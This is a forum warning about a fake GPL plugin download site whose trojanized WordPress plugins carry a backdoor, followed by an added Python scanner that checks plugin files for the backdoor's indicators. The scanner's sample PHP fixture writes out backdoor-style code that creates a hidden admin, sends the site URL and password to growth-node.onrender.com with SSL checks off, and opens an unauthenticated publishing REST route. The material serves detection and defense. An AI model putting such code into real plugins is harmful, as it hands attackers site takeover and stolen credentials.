January 5, 2026 at 9:03 am #26676
A M (Participant)
This site hosts legitimate-looking GPL premium plugins and is designed to look like a complete clone of GPLDL.com, except with user registration and login disabled.
The plugins work, so you may not notice the difference; however, they also insert a malicious code block into the plugin files that:
(a) creates a hidden administrator,
(b) phones home with site details and credentials,
(c) registers a hidden custom post type, and
(d) exposes an unauthenticated REST endpoint that lets anyone publish or update posts on your site.

What this code does:
1) Runs on every request until it “activates” itself
On first run, it calls gpl_trial_activate() and sets a flag so it won’t run again.
2) Creates a hidden administrator and exfiltrates credentials
Creates a new admin: iamgrowing (hidden).
Sends your site URL and possibly the generated admin password to a remote service.
Disables SSL verification, making it easier to MITM (and a sign of poor intent).
Stores a post_type_letter value from the remote service to define a hidden post type later.
3) Hides that admin from the Users list
Modifies the users query so anyone with gpl_hidden_user = 1 disappears from the admin UI.
4) Registers a hidden custom post type dynamically
Creates a public CPT that is invisible in wp‑admin (show_ui false), making content exist on the front‑end while staying out of sight.
5) Exposes an unauthenticated REST route that can publish/update posts
Because permission_callback is __return_true, anyone on the internet can POST to /wp-json/gpl/v1/publish-builder-pro and create or update published posts of a chosen post type, including one that’s registered on demand and hidden in the admin UI.
If these are created when no user is logged in, post_author likely becomes 0 (no author), which is a useful IOC.
6) Elementor “notice” helpers (likely decoys)
The elementor_pro_* functions just build upgrade notices. They’re probably benign/decoys and not central to the backdoor.

Why this is dangerous
Privilege escalation & persistence: It creates a new admin and hides it from the user list.
Credential exfiltration: It sends your site URL and (potentially) admin password to a remote server, with SSL verification disabled.
Stealth content control: It registers hidden CPTs and enables unauthenticated publishing/updating via REST, making it trivial to inject pages or posts without leaving obvious traces in the admin UI.
Network beaconing: Connects to growth-node.onrender.com to coordinate the CPT letter and possibly track infections.
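The post above describes the backdoor by its names and behaviours but gives no way to check a downloaded plugin for them. The following is an added example, not code from the post or from any plugin: a static indicator scan that walks a WordPress plugin directory and reports files containing the names the post gives (gpl_trial_activate, the iamgrowing admin, gpl_hidden_user, growth-node.onrender.com, post_type_letter) together with the weaker patterns (show_ui => false, disabled SSL verification, and register_rest_route() calls that accept a writing HTTP method with permission_callback => __return_true). The regex forms, the 'sslverify' key as the way SSL verification is disabled, and the sample plugin files are constructed assumptions so the script runs offline.

```python
"""Static indicator scan for the trojanized-plugin backdoor described above.
Added example, not the post's or any plugin's code. Indicator names are taken
from the post; the regexes, the 'sslverify' key and the sample plugin tree are
constructed assumptions for a runnable demonstration."""
import os
import re
import tempfile

# Strong indicators: names specific to the backdoor the post describes.
STRONG = {
    "trial_activate_hook": re.compile(r"\bgpl_trial_activate\s*\("),
    "hidden_admin_login": re.compile(r"['\"]iamgrowing['\"]"),
    "hidden_user_meta": re.compile(r"\bgpl_hidden_user\b"),
    "c2_host": re.compile(r"growth-node\.onrender\.com"),
    "remote_post_type_letter": re.compile(r"\bpost_type_letter\b"),
}
# Weak indicators: legitimate plugins use these too, so they only add context.
# 'sslverify' => false is assumed to be how the WP HTTP API call turned
# certificate checking off (the post only says "disables SSL verification").
WEAK = {
    "ssl_verify_disabled": re.compile(r"['\"]sslverify['\"]\s*=>\s*false", re.I),
    "hidden_cpt_show_ui_false": re.compile(r"['\"]show_ui['\"]\s*=>\s*false", re.I),
}
REST_CALL = re.compile(r"register_rest_route\s*\(.*?\)\s*;", re.S)
OPEN_PERMISSION = re.compile(r"['\"]permission_callback['\"]\s*=>\s*['\"]__return_true['\"]")
# Heuristic: a writing method named within 80 chars after 'methods' =>.
WRITABLE_METHOD = re.compile(
    r"['\"]methods['\"]\s*=>.{0,80}?(?:POST|PUT|PATCH|DELETE|CREATABLE|EDITABLE|DELETABLE|ALLMETHODS)",
    re.S)


def line_of(src: str, offset: int) -> int:
    """1-based line number of a character offset in src."""
    return src.count("\n", 0, offset) + 1


def open_writable_rest_routes(src: str):
    """Lines of register_rest_route() calls that both accept a writing method
    and use __return_true as permission_callback (the post's publish route)."""
    return [line_of(src, c.start()) for c in REST_CALL.finditer(src)
            if OPEN_PERMISSION.search(c.group(0)) and WRITABLE_METHOD.search(c.group(0))]


def scan_source(src: str):
    """Return {indicator_name: [line, ...]} for one PHP source string."""
    findings = {}
    for name, rx in {**STRONG, **WEAK}.items():
        lines = [line_of(src, m.start()) for m in rx.finditer(src)]
        if lines:
            findings[name] = lines
    rest = open_writable_rest_routes(src)
    if rest:
        findings["unauthenticated_writable_rest_route"] = rest
    return findings


def scan_plugin_dir(root: str):
    """Scan every .php file under root; return {relative_path: findings}."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.endswith(".php"):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings = scan_source(fh.read())
                if findings:
                    report[os.path.relpath(path, root)] = findings
    return report


def verdict(report: dict) -> str:
    """'backdoor' on any strong indicator or open writable REST route,
    'review' on weak indicators only, else 'clean'."""
    names = {n for f in report.values() for n in f}
    if names & (set(STRONG) | {"unauthenticated_writable_rest_route"}):
        return "backdoor"
    return "review" if names else "clean"


# Constructed sample files: the shape of the injected block as the post
# describes it (not the real malware's code) and one clean read-only route.
SAMPLE_INJECTED_PHP = """<?php
add_action('init', function () {
    if (!get_option('gpl_trial_done')) { gpl_trial_activate(); update_option('gpl_trial_done', 1); }
});
function gpl_trial_activate() {
    $pw = wp_generate_password(20);
    $uid = wp_create_user('iamgrowing', $pw, 'x@example.invalid');
    update_user_meta($uid, 'gpl_hidden_user', 1);
    $r = wp_remote_post('https://growth-node.onrender.com/x',
        ['sslverify' => false, 'body' => ['u' => home_url(), 'p' => $pw]]);
    update_option('post_type_letter', wp_remote_retrieve_body($r));
}
add_action('rest_api_init', function () {
    register_rest_route('gpl/v1', '/publish-builder-pro', [
        'methods' => 'POST', 'callback' => 'gpl_publish',
        'permission_callback' => '__return_true',
    ]);
});
"""
SAMPLE_CLEAN_PHP = """<?php
add_action('rest_api_init', function () {
    register_rest_route('demo/v1', '/status', [
        'methods' => 'GET', 'callback' => 'demo_status',
        'permission_callback' => '__return_true',
    ]);
});
"""


def write_sample_plugin() -> str:
    """Create a throwaway plugin tree with one trojanized and one clean file."""
    root = tempfile.mkdtemp(prefix="gpl-scan-")
    os.makedirs(os.path.join(root, "includes"))
    for rel, body in (("plugin.php", SAMPLE_CLEAN_PHP), ("includes/loader.php", SAMPLE_INJECTED_PHP)):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    report = scan_plugin_dir(write_sample_plugin())  # point this at a real plugin dir
    for path, findings in report.items():
        for name, lines in findings.items():
            print(f"{path}: {name} at line(s) {lines}")
    print("verdict:", verdict(report))
```

The file scan only covers the plugin code. For a site already running a trojanized plugin, the post's own IOCs also apply to the database: a user with gpl_hidden_user = 1 in usermeta, the iamgrowing login, and published posts with post_author = 0, none of which this script checks.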